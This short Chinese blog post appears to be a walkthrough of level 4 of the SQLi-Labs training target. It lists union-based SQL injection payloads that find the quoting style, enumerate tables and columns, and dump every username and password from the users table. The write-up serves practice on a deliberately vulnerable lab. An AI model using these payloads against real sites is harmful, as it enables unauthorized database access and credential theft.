loekr的摘要机器人
TianliGPT
生成中...

SQLiLabs打靶

第四关

?id=2"       '后显示
SQL

image-20240117205705845

根据页面报错信息得知sql语句是双引号字符型且有括号。

输入内容为
2")
1c

所以

?id=1") order by 3--+
?id=-1") union select 1,database(),version() --+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
?id=-1") union select 1,group_concat(username),group_concat(password) from users --+
SQL

image-20240117210912107

第四关完成